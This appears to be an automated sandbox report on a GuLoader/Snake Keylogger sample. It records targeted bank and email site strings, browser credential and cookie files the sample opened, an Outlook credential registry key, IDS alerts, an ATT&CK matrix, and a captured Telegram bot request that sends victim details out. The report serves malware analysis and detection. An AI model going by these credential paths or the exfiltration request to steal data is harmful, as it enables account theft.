Source: SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe, 00000007.00000002.2937408333.00000000391CB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696494690
Source: SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe, 00000007.00000002.2937408333.0000000039226000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696494690x
Source: SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe, 00000007.00000002.2937408333.00000000391CB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696494690t
Source: SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe, 00000007.00000002.2937408333.00000000391CB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696494690}
Source: SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe, 00000007.00000002.2937408333.00000000391CB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696494690x
Source: SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe, 00000007.00000002.2937408333.00000000391CB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690
Source: SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe, 00000007.00000002.2937408333.00000000391CB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696494690]
Source: SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe, 00000007.00000002.2937408333.00000000391CB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696494690x
Source: SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe, 00000007.00000002.2937408333.0000000039226000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696494690\|UE
Source: SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe, 00000007.00000002.2937408333.00000000391CB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
Source: SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe, 00000007.00000002.2937408333.0000000039226000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696494690d
Source: SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe, 00000007.00000002.2937408333.00000000391CB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696494690\|UE
Source: SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe, 00000007.00000002.2937408333.00000000391CB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696494690f
Source: SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe, 00000007.00000002.2937408333.00000000391CB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696494690s
Source: SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe, 00000007.00000002.2937408333.0000000039226000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696494690t
Source: SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe, 00000007.00000002.2937408333.0000000039226000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
Source: SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe, 00000007.00000002.2937408333.00000000391CB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
Source: SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe, 00000007.00000002.2937408333.00000000391CB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
Source: SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe, 00000007.00000002.2937408333.0000000039226000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696494690t
Source: SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe, 00000007.00000002.2937408333.0000000039226000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696494690u
Source: SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe, 00000007.00000002.2937408333.0000000039226000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
Source: SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe, 00000007.00000002.2937408333.0000000039226000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696494690}
Source: SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe, 00000007.00000002.2937408333.00000000391CB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696494690t
Source: SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe, 00000007.00000002.2937408333.0000000039226000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696494690o
Source: SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe, 00000007.00000002.2937408333.00000000391CB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696494690}
Source: SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe, 00000007.00000002.2937408333.0000000039226000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
Source: SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe, 00000007.00000002.2937408333.0000000039226000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696494690j
Source: SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe, 00000007.00000002.2937408333.0000000039226000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696494690x
Source: SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe, 00000007.00000002.2937408333.0000000039226000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
Source: SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe, 00000007.00000002.2937408333.00000000391CB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696494690x
Source: SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe, 00000007.00000002.2937408333.00000000391CB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
Source: SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe, 00000007.00000002.2937408333.0000000039226000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696494690}
Source: SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe, 00000007.00000002.2937408333.00000000391CB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696494690
Source: SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe, 00000007.00000002.2937408333.00000000391CB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
Source: SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe, 00000007.00000002.2937408333.00000000391CB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696494690h
Source: SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe, 00000007.00000002.2937408333.0000000039226000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696494690
Source: SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe, 00000007.00000002.2937408333.0000000039226000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696494690s
Source: SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe, 00000007.00000002.2937408333.00000000391CB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696494690j
Source: SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe, 00000007.00000002.2937408333.0000000039226000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690
Source: SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe, 00000007.00000002.2937408333.0000000039226000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
Source: SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe, 00000007.00000002.2937408333.0000000039226000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
Source: SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe, 00000007.00000002.2937408333.0000000039226000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696494690x
Source: SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe, 00000007.00000002.2937408333.0000000039226000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696494690
Source: SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe, 00000007.00000002.2937408333.0000000039226000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696494690
Source: SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe, 00000007.00000002.2937408333.0000000039226000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696494690f
Source: SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe, 00000007.00000002.2937408333.0000000039226000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696494690h

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	API call chain: ExitProcess graph end node			graph_0-4572
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	API call chain: ExitProcess graph end node			graph_0-4575

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe

Code function: 0_2_10001A5D GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,

0_2_10001A5D

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe

Process created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe"

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Queries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe

Code function: 0_2_00405D1B GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,

0_2_00405D1B

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match

File source: 00000007.00000002.2935251824.0000000037EA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: Yara match

File source: Process Memory Space: SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe PID: 3040, type: MEMORYSTR

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match

File source: 00000007.00000002.2935251824.0000000037EA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Native API	1 DLL Side-Loading	1 Access Token Manipulation	11 Masquerading	1 OS Credential Dumping	21 Security Software Discovery	Remote Services	1 Email Collection	1 Web Service	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	11 Process Injection	1 Disable or Modify Tools	LSASS Memory	31 Virtualization/Sandbox Evasion	Remote Desktop Protocol	1 Archive Collected Data	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	31 Virtualization/Sandbox Evasion	Security Account Manager	1 Application Window Discovery	SMB/Windows Admin Shares	1 Data from Local System	3 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Access Token Manipulation	NTDS	1 System Network Configuration Discovery	Distributed Component Object Model	1 Clipboard Data	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	11 Process Injection	LSA Secrets	3 File and Directory Discovery	SSH	Keylogging	14 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Deobfuscate/Decode Files or Information	Cached Domain Credentials	215 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	3 Obfuscated Files or Information	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 7_2_0755FA70 CryptUnprotectData,		7_2_0755FA70
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 7_2_0755FA68 CryptUnprotectData,		7_2_0755FA68

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:302494%0D%0ADate%20and%20Time:%2018/02/2025%20/%2002:43:21%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20302494%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 104.21.48.1 104.21.48.1
Source: Joe Sandbox View	IP Address: 104.21.48.1 104.21.48.1
Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 193.122.6.168 193.122.6.168

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49944 -> 193.122.6.168:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49925 -> 193.122.6.168:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49938 -> 104.21.48.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49969 -> 104.21.48.1:443
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.8:49889 -> 142.250.186.174:443

Source: SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Virustotal: Detection: 22%			Perma Link
Source: SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	ReversingLabs: Detection: 16%

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 4x nop then jmp 0755FDF8h	7_2_0755FB17
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 4x nop then jmp 0755F45Dh	7_2_0755F4AC
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 4x nop then jmp 0755F45Dh	7_2_0755F2D0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 4x nop then jmp 3A6CD248h	7_2_3A6CCF50
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 4x nop then jmp 3A6CD710h	7_2_3A6CD418
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 4x nop then jmp 3A6CCC1Fh	7_2_3A6CC8B0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 4x nop then jmp 3A6CA136h	7_2_3A6C9E68
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 4x nop then jmp 3A6CB93Eh	7_2_3A6CB670
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 4x nop then jmp 3A6CE568h	7_2_3A6CE270
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 4x nop then jmp 3A6C3D0Eh	7_2_3A6C3A40
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 4x nop then jmp 3A6CFD50h	7_2_3A6CFA58
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 4x nop then jmp 3A6C7CEEh	7_2_3A6C7A20
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 4x nop then jmp 3A6C5CFEh	7_2_3A6C5A30
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 4x nop then jmp 3A6C21AEh	7_2_3A6C1EE0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 4x nop then jmp 3A6CA5C6h	7_2_3A6CA2F8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 4x nop then jmp 3A6C618Eh	7_2_3A6C5EC0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 4x nop then jmp 3A6C419Eh	7_2_3A6C3ED0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 4x nop then jmp 3A6C817Eh	7_2_3A6C7EB0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 4x nop then jmp 3A6C462Eh	7_2_3A6C4360
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 4x nop then jmp 3A6C263Eh	7_2_3A6C2370
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 4x nop then jmp 3A6C85E7h	7_2_3A6C8340
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 4x nop then jmp 3A6C661Eh	7_2_3A6C6350
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 4x nop then jmp 3A6CEA30h	7_2_3A6CE738
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 4x nop then jmp 3A6CBDCEh	7_2_3A6CBB00
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 4x nop then jmp 3A6C6AAEh	7_2_3A6C67E0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 4x nop then jmp 3A6C4ABEh	7_2_3A6C47F0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 4x nop then jmp 3A6CAA56h	7_2_3A6CA788
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 4x nop then jmp 3A6C8A66h	7_2_3A6C8798
